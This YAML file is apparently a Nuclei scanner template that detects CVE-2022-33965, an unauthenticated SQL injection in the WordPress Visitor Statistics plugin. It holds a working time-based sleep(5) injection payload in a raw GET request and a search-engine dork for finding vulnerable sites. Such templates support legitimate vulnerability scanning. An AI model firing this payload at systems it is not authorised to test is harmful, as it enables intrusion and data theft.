50 lines
1.7 KiB
YAML
50 lines
1.7 KiB
YAML
id: CVE-2022-33965
|
|
|
|
info:
|
|
name: WordPress Visitor Statistics <=5.7 - SQL Injection
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
WordPress Visitor Statistics plugin through 5.7 contains multiple unauthenticated SQL injection vulnerabilities. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
|
reference:
|
|
- https://patchstack.com/database/vulnerability/wp-stats-manager/wordpress-wp-visitor-statistics-plugin-5-7-multiple-unauthenticated-sql-injection-sqli-vulnerabilities
|
|
- https://wordpress.org/plugins/wp-stats-manager/
|
|
- https://wordpress.org/plugins/wp-stats-manager/#developers
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-33965
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-33965
|
|
cwe-id: CWE-89
|
|
epss-score: 0.01053
|
|
cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
google-query: inurl:"/wp-content/plugins/wp-stats-manager"
|
|
verified: true
|
|
framework: wordpress
|
|
vendor: plugins-market
|
|
product: wp_visitor_statistics
|
|
tags: cve,cve2022,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@timeout: 15s
|
|
GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(5)+or+' HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration>=5'
|
|
|
|
- type: regex
|
|
regex:
|
|
- "^1331' and sleep\\(5\\) or '$"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|